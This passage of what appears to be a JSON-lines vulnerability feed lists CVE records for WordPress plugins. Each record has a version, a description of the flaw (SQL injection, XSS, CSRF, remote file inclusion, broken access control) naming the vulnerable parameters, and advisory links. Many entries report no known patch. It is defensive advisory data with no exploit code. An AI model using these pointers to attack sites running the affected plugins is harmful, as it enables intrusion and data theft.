link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/3.5.8\\\/classes\\\/class-wcmp-vendor-dashboard.php?rev=2381617#L432\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/3.5.8\\\/classes\\\/class-wcmp-vendor-dashboard.php?rev=2381617#L432\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c3d9fa7-8ea2-4213-8b28-2ca9191a8223?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2c3d9fa7-8ea2-4213-8b28-2ca9191a8223?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3677","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.89","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to SQL Injection via the pageId parameter in versions up to, and including, 1.2.89 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for subscribers or higher to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L712\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L712\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4336d597-7e87-46eb-8abd-9fafd6cd25d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4336d597-7e87-46eb-8abd-9fafd6cd25d9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2949518\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?contextall=1&old=2935371&old_path=%2Fwoo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2949518\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?contextall=1&old=2935371&old_path=%2Fwoo-pdf-invoice-builder%2Ftrunk%2Fwoocommerce-pdf-invoice-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5668","slug":"whatsapp","versionImpact":"1.0.1","description":"The WhatsApp Share Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'whatsapp' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77911b0f-c028-49ae-b85e-15909d806e30?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77911b0f-c028-49ae-b85e-15909d806e30?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/whatsapp\\\/tags\\\/1.0.1\\\/class-frontend.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/whatsapp\\\/tags\\\/1.0.1\\\/class-frontend.php#L46\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3722","slug":"swift-performance-lite","versionImpact":"2.3.6.18","description":"The Swift Performance Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the ajax_handler() function in all versions up to, and including, 2.3.6.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve and modify settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/setup\\\/setup.php#L97\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/swift-performance-lite\\\/trunk\\\/includes\\\/setup\\\/setup.php#L97\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b7736a-e3e0-4ecd-9adf-284568b02ef7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58b7736a-e3e0-4ecd-9adf-284568b02ef7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5577","slug":"where-i-was-where-i-will-be","versionImpact":"1.1.1","description":"The Where I Was, Where I Will Be plugin for WordPress is vulnerable to Remote File Inclusion in version <= 1.1.1 via the WIW_HEADER parameter of the \/system\/include\/include_user.php file. This makes it possible for unauthenticated attackers to include and execute arbitrary files hosted on external servers, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution. This requires allow_url_include to be set to true in order to exploit, which is not commonly enabled.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e0f54d-08ec-4e41-ac9b-d72cdde5a724?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68e0f54d-08ec-4e41-ac9b-d72cdde5a724?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/where-i-was-where-i-will-be\\\/trunk\\\/system\\\/include\\\/include_user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/where-i-was-where-i-will-be\\\/trunk\\\/system\\\/include\\\/include_user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6168","slug":"just-custom-fields","versionImpact":"3.3.2","description":"The Just Custom Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.3.2. This is due to missing or incorrect nonce validation on several AJAX functions. This makes it possible for unauthenticated attackers to invoke this functionality intended for admin users via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This enables subscribers to manage field groups, change visibility of items among other things.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d98946e-864f-434e-8f45-85d663bbefee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9d98946e-864f-434e-8f45-85d663bbefee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/just-custom-fields\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6897","slug":"athemes-starter-sites","versionImpact":"1.0.53","description":"The aThemes Starter Sites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d06c02-fad7-4d2f-a230-03723ba828b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0d06c02-fad7-4d2f-a230-03723ba828b3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/athemes-starter-sites\\\/trunk\\\/v2\\\/classes\\\/class-importer.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/athemes-starter-sites\\\/trunk\\\/v2\\\/classes\\\/class-importer.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/athemes-starter-sites\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/athemes-starter-sites\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124434\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3124434\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9837","slug":"auto-date-year-month","versionImpact":"2.0.1","description":"The AADMY \u2013 Add Auto Date Month Year Into Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.1. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb165cba-34a9-42d9-bfd5-31a290d02311?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb165cba-34a9-42d9-bfd5-31a290d02311?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-date-year-month\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/auto-date-year-month\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-date-year-month\\\/trunk\\\/auto-date-year-month.php#L218\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-date-year-month\\\/trunk\\\/auto-date-year-month.php#L218\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167908\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167908\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-44020","slug":"wp-free-ssl","versionImpact":"1.2.6","description":"Missing Authorization vulnerability in Prasad Kirpekar WP Free SSL \u2013 Free SSL Certificate for WordPress and force HTTPS allows .\n\nThis issue affects WP Free SSL \u2013 Free SSL Certificate for WordPress and force HTTPS: from n\/a through 1.2.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-free-ssl\\\/wordpress-wp-free-ssl-plugin-1-2-6-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-free-ssl\\\/wordpress-wp-free-ssl-plugin-1-2-6-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11435","slug":"salavat-counter","versionImpact":"0.9.1","description":"The salavat counter Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 0.9.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salavat-counter\\\/trunk\\\/wp-table-class.php#L85\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/salavat-counter\\\/trunk\\\/wp-table-class.php#L85\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ecdd962-7d85-4a60-956d-1e8a49507ab2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ecdd962-7d85-4a60-956d-1e8a49507ab2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11823","slug":"folder-gallery","versionImpact":"1.7.4","description":"The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folder-gallery\\\/trunk\\\/foldergallery.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folder-gallery\\\/trunk\\\/foldergallery.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folder-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folder-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4521959-416e-4ff5-96c0-bc4dbb0187b7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12384","slug":"woo-binary-mlm","versionImpact":"2.0","description":"The Binary MLM Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page\u2019 parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/payout\\\/payout-report.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/register-first-user.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-binary-mlm\\\/trunk\\\/includes\\\/admin\\\/register-first-user.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdf6b2ea-5a6a-481b-9431-650c895f54ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fdf6b2ea-5a6a-481b-9431-650c895f54ef?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3670","slug":"kiwichat","versionImpact":"6.2","description":"The KiwiChat NextClient plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kiwichat\\\/trunk\\\/public\\\/index.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kiwichat\\\/trunk\\\/public\\\/index.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwichat\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kiwichat\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd6f6a2c-59d3-4091-82ac-0edf9f47ef65?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fd6f6a2c-59d3-4091-82ac-0edf9f47ef65?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11267","slug":"jsp-store-locator","versionImpact":"1.0","description":"The JSP Store Locator WordPress plugin through 1.0 does not sanitize and escape a parameter before using it in a SQL statement, allowing users with the Contributor role to perform SQL injection attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcbdc11a-a194-46e4-8c22-11010b98fdab\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fcbdc11a-a194-46e4-8c22-11010b98fdab\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6221","slug":"embed-bokun","versionImpact":"0.23","description":"The Embed Bokun plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 0.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-bokun\\\/trunk\\\/embed-bokun.php#L226\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-bokun\\\/trunk\\\/embed-bokun.php#L226\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-bokun\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-bokun\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2947a6e9-e357-4751-adfd-f9043bef75e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2947a6e9-e357-4751-adfd-f9043bef75e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0418","slug":"video-central","versionImpact":"1.3.0","description":"The Video Central for WordPress plugin through 1.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/821751bb-feaf-45b8-91a9-e173cb0c05fc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/821751bb-feaf-45b8-91a9-e173cb0c05fc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4338","slug":"404-to-301","versionImpact":"3.0.7","description":"The 404 to 301 plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on the open_redirect & save_redirect functions in versions up to, and including, 3.0.7. This makes it possible for authenticated attackers to view, create and edit redirections.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f147107-bc5a-4a01-9979-cd9e16061f12\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9f147107-bc5a-4a01-9979-cd9e16061f12\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2546695\\\/404-to-301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2546695\\\/404-to-301\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05d6b27f-b1e5-4bb8-b7db-f8295a5e0d5b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05d6b27f-b1e5-4bb8-b7db-f8295a5e0d5b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/broken-access-control-vulnerability-fixed-in-wordpress-404-to-301-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/broken-access-control-vulnerability-fixed-in-wordpress-404-to-301-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-404-to-301-redirect-log-and-notify-404-errors-security-bypass-3-0-7\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-404-to-301-redirect-log-and-notify-404-errors-security-bypass-3-0-7\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36740","slug":"radio-buttons-for-taxonomies","versionImpact":"2.0.5","description":"The Radio Buttons for Taxonomies plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the save_single_term() function. This makes it possible for unauthenticated attackers to save terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368215%40radio-buttons-for-taxonomies&new=2368215%40radio-buttons-for-taxonomies&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2368215%40radio-buttons-for-taxonomies&new=2368215%40radio-buttons-for-taxonomies&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a246c3-cf67-4566-b1e8-dc14c3c5c827?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a246c3-cf67-4566-b1e8-dc14c3c5c827?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3636","slug":"wedevs-project-manager","versionImpact":"2.6.4","description":"The WP Project Manager plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 2.6.4 due to insufficient restriction on the 'save_users_map_name' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'usernames' 